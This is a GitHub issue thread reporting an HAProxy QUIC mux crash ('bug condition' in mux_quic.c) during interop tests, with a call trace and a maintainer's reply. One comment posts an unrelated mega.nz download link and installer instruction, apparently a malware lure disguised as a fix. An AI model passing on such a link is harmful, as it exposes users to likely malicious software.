### ISSUE TITLE
"FATAL: bug condition" hit on running QUIC Interop test (AWS-LC, ngtcp2, transfer test)

### ISSUE THREAD

**Issue by chipitsine** [haproxy/haproxy#2690]
### Detailed Description of the Problem

```
FATAL: bug condition "((&qcs->el_buf)->n != (&qcs->el_buf))" matched at src/mux_quic.c:3109
  call trace(15):
  | 0x5643c8b38599 [ba d9 00 00 00 48 8d 35]: main-0x1af819
  | 0x5643c8be2005 [48 89 45 b0 41 f6 44 24]: main-0x105dad
  | 0x5643c8cd7f94 [41 89 c6 85 c0 0f 88 cc]: main-0xfe1e
  | 0x5643c8cdbd1f [41 09 c5 45 85 ed 74 33]: sc_conn_io_cb+0x93/0xe5
  | 0x5643c8d65548 [48 c7 c0 f8 55 ff ff 64]: run_tasks_from_lists+0x173/0x9c2
  | 0x5643c8d66099 [8b 7d a0 29 c7 85 ff 0f]: process_runnable_tasks+0x302/0x6e6
  | 0x5643c8ce7296 [83 3d 67 b4 44 00 01 0f]: run_poll_loop+0x6e/0x57b
  | 0x5643c8ce7a46 [48 8b 1d 03 14 1e 00 48]: main-0x36c
  | 0x5643c8ceaa06 [b8 00 00 00 00 e8 35 73]: main+0x2c54/0x3218

Hint: when reporting this bug to developers, please check if a core file was
      produced, open it with 'gdb', issue 'bt' to produce a backtrace for the
      current thread only, then join it with the bug report.

```

### Expected Behavior

not to fail

### Steps to Reproduce the Behavior

that should be available right next tuesday after enabling ngtcp2 client in weekly QUIC Interop run

### What is your configuration?

```haproxy
usual QUIC Interop
```

### Output of `haproxy -vv`

```plain
do not have ((
```

**Comment by chipitsine** [comment]
[logs-ngtcp2.zip](https://github.com/user-attachments/files/16739533/logs-ngtcp2.zip)

logs attached

**Comment by chipitsine** [comment]
[logs-quic-go.zip](https://github.com/user-attachments/files/16739601/logs-quic-go.zip)

similar failure on quic-go client

**Comment by AlecsSantos** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by haproxyFred** [comment]
This issue is already several times reported by the official interop runner which runs a qns haproxy image built from "ade-quic-improve-mux-bandwidth" quic-dev branch. Thanks for this report. I will close it.
